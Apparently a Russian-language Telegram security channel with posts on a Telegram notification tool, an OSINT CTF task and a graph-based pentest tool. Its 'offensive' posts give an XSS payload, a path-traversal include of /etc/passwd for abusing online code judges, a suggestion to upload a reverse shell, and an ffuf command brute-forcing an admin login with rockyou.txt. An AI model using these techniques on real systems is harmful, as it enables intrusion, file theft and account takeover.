the sun
253 subscribers
32 photos
3 videos
3 files
24 links
Download Telegram
Channel created
Channel photo updated
https://github.com/ArturLukianov/tgecho

#tool #github #telegram #my #c

маленькая но в то же время удобная программа на С - отправляет сообщение в чат телеграмма через бота

удобно встраивать в пайплайны, особенно когда что-то висит в фоне или даже на сервере - достаточно просто добавить `&& tgecho "Task finished!"' и оставить задачу на сервере с nohup и в фоне
Channel name was changed to «the sun»
Небольшой разборчик таска от Tatar Osint Mindset

#osint #twitter #domain
Forwarded from tatar OSINT mindset (бедолага)
Второй таск для Tatar OSINT mindset

Новый ИБ стартап "Purple Watch" хвалится в своих социальных сетях, что их никто не сможет взломать и скоро они завоют весь рынок. Данный стартап заказал у вашей компании пентест, и в рамках OSINT этапа вам необходимо найти любую чувствительную информацию, которая может нанести ущерб компании.

Данный таск имеет 2 ответа: 1) Чувствительная информация 2) Флаг (вы сразу поймете при его нахождении)

Процесс решения вы можете обсуждать в данном чате.
https://github.com/ArturLukianov/totacres

#tool #github #my #python #offensive #graph

почему бы не применить подход Maltego к пентесту? IP адреса, порты, сервисы, веб странички, файлы можно представить в виде узлов графа, а сканирование через nmap, поиск директорий и использование metasploit для получения бэк-коннекта - как рёбра (они же transforms в maltego)

в этой тулзе я реализовал подобный подход, хотя всё ещё есть много проблем, несмотря на красоту идеи:
- если есть узел представляющий логин/почту (например вытащенную с сайта) и другой узел, пароль - как применить transform сразу к обоим, чтобы попытаться залогиниться в ssh/ftp/панельку?
- как обрабатывать человеко читаемые данные? Не сразу же GPT тащить с собой. Можно написать regex - но их надо будет слишком много и они могут пропускать. Или обучить модельку искать пароли в документе - но нужно размечать датасет
- есть вещи, которые требуют человеческого понимания - например то, насколько перспективно искать поддиректории в директориях. Пентестер поймёт, что искать поддиректории /css/ не так полезно как /api/ . Составлять модули и формализовать все такие знания кажется не очень полезным..

Но то что оно работает - это круто
Одна из машинок на tryhackme, решённая этим инструментом полностью
#offensive #compiler

Из систем для проверки кода (codeforces, итп) можно вытаскивать данные разными забавными способами

Таким макросом иногда можно получить ОС которую использует тестовая система:
cpp=
#ifdef _WIN32
#pragma message "Windows 32-bit"
#elif _WIN64
#pragma message "Windows 64-bit"
#elif APPLE || MACH
#pragma message "Mac OSX"
#elif linux
#pragma message "Linux"
#elif FreeBSD
#pragma message "FreeBSD"
#elif unix || unix__
#pragma message "Unix"
#else
#pragma message "Other"
#endif

int main() {}

Иногда с помощью макроса можно затриггерить XSS:
#pragma message "</pre><script>alert('xss')</script>"

int main() {}

А в некоторых случаях даже читать файлы инклудом:
#include "../../../../../../../../../etc/passwd"

int main() {}


И конечно никто не отменял возможность залить рев-шел (но лучше заливать сразу последовательность команд с выводом, так как таймлимит часто убивает программу до того как что-то успеешь сделать)
#offensive #burp #ffuf #web #bruteforce

Если использовать Burp Intruder для брутфорса (пиратку точно), то он может просто умирать при большом количестве запросов - вероятно кончается память для хранения ответов.

Один из вариантов - использовать ffuf для брутфорса.
Можно скопировать запрос из Developer Tools браузера в curl запрос -> заменить curl на ffuf -> добавить -u перед url и вордлист -> настроить фильтры на incorrect username -> наслаждаться многопоточным опенсорсным http брутфорсом который можно ставить на паузу

ffuf -w ./Wordlists/rockyou.txt -X POST -u https://somepage.com/login --data 'username=admin&password=FUZZ'